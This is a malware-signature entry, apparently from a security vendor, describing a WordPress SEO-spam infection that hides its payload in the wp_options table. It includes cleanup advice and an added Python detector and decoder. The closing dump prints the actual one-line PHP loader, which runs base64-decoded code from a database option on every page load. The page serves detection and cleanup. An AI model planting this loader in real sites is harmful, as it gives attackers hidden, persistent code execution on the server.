Malware Signatures

php.spam-seo.dbload.001

Blackhat SEO is a malicious technique used to manipulate search engine results in order to boost a website's relevance. The payload is PHP-based, so it is intended for server-side use and executes directly on the server while the site is loaded. Only the payload's result (such as a malicious iframe or redirect) is visible in the browser, not the malicious code itself.
This malware is WordPress-specific: it relies not only on the filesystem to install itself but also on the database (wp_options), where the final payload is stored obfuscated.

Affecting

Any vulnerable WordPress based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your files for suspicious usage of the add_action and get_option functions, and check your WordPress database. You can also contact Sucuri for help with removing the infection.
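
An added example (not Sucuri's tooling or code from this page) of the inspection described above, in Python: it flags the add_action/create_function/get_option loader shape in PHP source and decodes the referenced wp_options value for review without executing it. The function names and the sample option value are constructed; it assumes the option holds a PHP-serialized array of base64 strings, as the unserialize and base64_decode calls in the dump imply.

```python
import base64
import re

# Loader shape from the dump: add_action(... create_function(... get_option("<name>")
LOADER_RE = re.compile(
    r"add_action\s*\(.{0,200}?create_function\s*\(.{0,400}?"
    r"get_option\s*\(\s*['\"]([^'\"]+)['\"]", re.S)
KEY_RE = re.compile(rb'(?:i:\d+|s:\d+:"[^"]*");')   # array key (int or string)
STR_RE = re.compile(rb's:(\d+):"')                   # string value header

def find_loader_options(php_source):
    """Return the wp_options names a dbload-style loader reads its payload from."""
    return LOADER_RE.findall(php_source)

def parse_php_string_array(blob):
    """Parse a PHP-serialized array of strings into a list of bytes; nothing is executed."""
    head = re.match(rb"a:(\d+):\{", blob)
    if not head:
        raise ValueError("not a serialized PHP array")
    pos, chunks = head.end(), []
    for _ in range(int(head.group(1))):
        key = KEY_RE.match(blob, pos)
        val = STR_RE.match(blob, key.end()) if key else None
        if not val:
            raise ValueError("unexpected element at offset %d" % pos)
        start, length = val.end(), int(val.group(1))
        if blob[start + length:start + length + 2] != b'";':
            raise ValueError("string length mismatch at offset %d" % start)
        chunks.append(blob[start:start + length])
        pos = start + length + 2
    return chunks

def decode_option(blob):
    """Base64-decode each stored chunk to text for review."""
    return [base64.b64decode(c).decode("utf-8", "replace")
            for c in parse_php_string_array(blob)]

# Samples: the loader line as shown in the dump, and a constructed, harmless option value.
SAMPLE_PHP = r'''add_action('init', create_function('', implode("n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));'''
SAMPLE_OPTION = b'a:2:{i:0;s:12:"ZWNobyAxOw==";i:1;s:12:"ZWNobyAyOw==";}'

if __name__ == "__main__":
    for name in find_loader_options(SAMPLE_PHP):
        print("loader reads option:", name)
    for i, text in enumerate(decode_option(SAMPLE_OPTION)):
        print("chunk %d: %r" % (i, text))
```

Run the first function over theme and plugin files, then feed the option_value of each reported option name from wp_options to decode_option to see what the loader would have run.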

Dump


add_action('init', create_function('', implode("n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));